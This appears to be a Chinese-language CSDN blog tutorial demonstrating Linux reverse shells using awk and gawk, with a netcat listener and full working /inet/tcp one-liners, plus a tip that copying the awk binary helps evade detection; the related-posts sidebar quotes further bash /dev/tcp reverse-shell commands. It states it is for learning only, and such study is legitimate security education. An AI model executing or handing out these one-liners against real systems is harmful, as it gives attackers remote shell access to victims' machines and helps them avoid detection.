Linux反弹shell姿势复现(三)--- 利用awk、gawk反弹

最新推荐文章于 2023-11-13 23:22:35 发布
最新推荐文章于 2023-11-13 23:22:35 发布
阅读量1k 收藏 4
点赞数 1
分类专栏: linux 安全 反弹shell 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44283446/article/details/115478234
版权
安全 同时被 3 个专栏收录
17 篇文章 3 订阅
订阅专栏
linux
12 篇文章 2 订阅
订阅专栏
反弹shell
4 篇文章 1 订阅
订阅专栏

Linux反弹shell姿势复现(三)--- 利用awk、gawk反弹

前言

本博文仅供学习反弹shell的姿势使用,勿作其他用途的参考!

复现环境说明

  • 服务端(被监听)(ubuntu使用cat /proc/version查看,centos使用cat /etc/system-release查看):ubuntu 5.4.0-67-generic; centos:CentOS Linux release 7.5.1804 (Core)

  • 客户端(监听):kali 5.9.0-kali1-amd64

利用awk、gawk反弹

什么是awk、gawk?

    awk是一种处理文本文件的语言,是一种解释型的编程语言,可以使用awk来处理反弹的命令。具体的学习可以参考翻译成中文的网站:什么是awk?,看完这个网站上的内容,相信你就能看懂下面的操作了(* ̄︶ ̄)。
    gawk是GNU所做的awk,之后不断地更新迭代,gawk 包含 awk 的所有功能。

方法一:利用awk反弹

  1. 在监听端(kali端)开启监听:nc -nlvp 1231
    (此处假设开启的是1231端口)
    在这里插入图片描述
  2. 被监听端(centos端):
  • cp /usr/bin/awk /home/a (复制一个awk,一般情况下黑客如果做这一步是为了防止被检测,这一步可以不用做,直接用awk执行也是可以的)
  • /home/a 'BEGIN{s="/inet/tcp/0/kali的ip地址/1231"(BEGIN语句块在程序开始的使用执行,它只执行一次,BEGIN是awk的关键字,这个地方这条和下一条语句是拆开的,也可以合并在一起执行,注意合在一起执行的话,这条语句后面要加分号,比如看方法二,我会合并执行)
  • for(;s|&getline c;close(c))while (c|getline)print|&s;close(s)}'(与其他C系语言一样,awk也有for循环,getline命令表示让awk读取下一行内容,close()函数是内建函数)
  1. kali端拿到centOs的反弹过来的shell

方法二:利用gawk反弹

  1. 在监听端(kali端)开启监听:nc -nlvp 1231
    (此处假设开启的是1231端口)
    在这里插入图片描述
  2. 被监听端(centos端):
  • gawk 'BEGIN{s="/inet/tcp/0/kali的ip地址/1231";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
  1. kali端拿到centOs的反弹过来的shell

    以上是对利用awk、gawk进行反弹的一个小总结,现实中黑客会利用各种方法对反弹的方式进行变形等来躲避检测,变化更加的灵活,仍需多多查阅相关资料扩充,本文如有不足之处,欢迎指正(* ̄︶ ̄)。

yuQnY
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Linux命令行与shell脚本编程 - gawk进阶案例代码
06-04
在这个"Linux命令行与shell脚本编程 - gawk进阶案例代码"的主题中,我们将深入探讨gawk工具及其在shell脚本中的高级应用。 gawk,全称GNU Awk,是awk文本处理语言的一个实现,特别适用于处理结构化的文本数据。它...
MOXA_AWK-3121配置方法及要点说明
09-13
MOXA AWK-3121 的 web 功能配置主要包括个部分:IP 网络参数、工作模式选择和功率增强。 1. IP 网络参数:在 web 配置页面中,可以设置 IP 地址、子网掩码、默认网关、DNS 服务器等参数。 2. 工作模式选择:MOXA...
关于反弹Shell个人的一些理解与学习收获
最新发布
m0_63138919的博客
11-13 429
本文为个人对反弹shell的一些总结,大家可根据自己的需求进行了解,又不懂的地方或者建议可直接提出
反弹shell的各种姿势linux与windows)
weixin_42478365的博客
06-19 1003
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。 Linux 反弹shell 姿势一:bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -
反弹shell(未完待续)
weixin_52116519的博客
10-22 808
反弹shell亲手去测试总会遇到各种问题,这个问题也可能是玄学问题,那就重启咯。找解决方法时要注意加上系统及其版本,比如docker的安装在Ubuntu不同版本是不太一样的。为了防止入门劝退,最好找个跟自己一样系统版本的解决教程。先动手按照教程去实验一遍,不懂原理可以稍后去了解,不要因为不会就永远停在一个地方。最近看到的两句话(1)学习的本质是模仿。不会走先学爬,照葫芦画瓢,慢慢积累实战经验。(2)掌握一门学科所用的时间越短,学习质量就越高,对知识的理解也越深。
安全反弹Shell的原理及18般利用姿势
qqchaozai的专栏
12-29 2098
前言 shell:一种用来执行操作系统指令的程序 反弹shell (reverse shell):一种让远程系统执行本地shell的程序。 1 原理 远程系统监听一个TCP/UDP端口,本地系统运行反弹shell反弹shell会连接该端口,并接收远程系统发送的shell指令,执行之后再将指令的输出流转发给远程系统。 1.1文件描述符 ...
Linux常用的反弹shell命令
m0_63200360的博客
04-24 2580
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
几种常见反弹shell汇总
秋叶依剑
11-10 1万+
0x01. bash 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 解释: bash -i 打开一个交互的bash >& 将标准...
linux-shell脚本命令:awk命令简介
07-27
本文主要对linux-shell脚本命令中的awk命令进行简单介绍,希望对您有所帮助。
linux-awklinux-awk
08-10
linux-awk.doc
linux-Shell编程视频教程
12-03
11.2.3 Shell编程-字符截取命令-awk命令.mp4 11.2.4 Shell编程-字符截取命令-sed命令.mp4 11.3 Shell编程-字符处理命令.mp4 11.4 Shell编程-条件判断.mp4 11.5.1 Shell编程-流程控制-if语句.mp4 11.5.2 Shell...
反弹shell
stonesharp的专栏
04-03 3373
各种反弹shell的方式 - R00tGrok 时间 2014-04-06 23:27:00  博客园精华区原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言:在乌云社区看到反弹shell的几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面
论内网渗透中,反弹shell的各种姿势
热门推荐
weixin_43526443的博客
12-13 7万+
反弹shell是进入内网的第一步,也是权限提升用到的至关重要的一步。 1、bash反弹 攻击机: nc -lvp 4444 客户机: bash -i>& /dev/tcp/10.1.2.2/4444 0>&1 命令介绍: nc -i使用监听模式 -v 显示命令执行过程 -p 指定端口号。 -e 执行给定的命令 bash -i使用交互模式, -c 执行跟的命令 重定向 0:标准输入,
反弹Shell的方式和详解
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
反弹shell总结
weixin_44576725的博客
04-26 4532
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
Linux反弹shell命令语句解析
Lee_Natuo的博客
12-07 862
Linux反弹shell命令语句 语句格式 bash -i >& /dev/tcp/[ip]/[port] 0>&1 bash -i 打开bash &后面跟 /dev/tcp/[ip]/[port] (相当于>&后面接文件)将bash的标准输出和标准错误输出传递到远
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)
weixin_43803070的博客
07-10 2142
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。 实验环境: CentOS 6.5:192.168...
反弹shell命令
Shanfenglan's blog
10-29 2649
文章目录Bash TCPBash UDP:Netcat:Ncat:Telnet:Socat:Perl:Python:PHP:Ruby:OpenSSL:Powershell:Awk:TCLshJava:War:Lua:NodeJS:Groovy:Meterpreter Shell:Xterm: Bash TCP bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0&l
linux反弹shell总结
redwand的博客
02-22 1413
本文总结了Linux下常用的反弹shell方式,同时说明了交互式shell的得到方法,最后积累了反弹shell语法高亮与tab自动补齐。
linux shell awk -F
09-01
Linux Shell中的awk -F命令用于指定字段的分隔符。在awk命令中,借用shell中类似于位置变量的方法,使用$1、$2、$3等顺序表示行(记录)中的不同字段。而awk命令默认的分隔符是空格。但是通过使用awk -F命令,我们可以指定其他字符作为分隔符来处理文本和数据。例如,如果我们想要以逗号作为分隔符,我们可以使用awk -F","来指定逗号为分隔符。这样,在awk命令中,我们就可以使用$1、$2、$3等来表示逗号分隔的不同字段了。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [linux awk命令详解](https://blog.csdn.net/qq_15245487/article/details/100144279)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【linuxShell 编程 awk 命令详解](https://blog.csdn.net/sirria1/article/details/126768903)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Shell脚本之awk篇](https://download.csdn.net/download/rio520/10572387)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值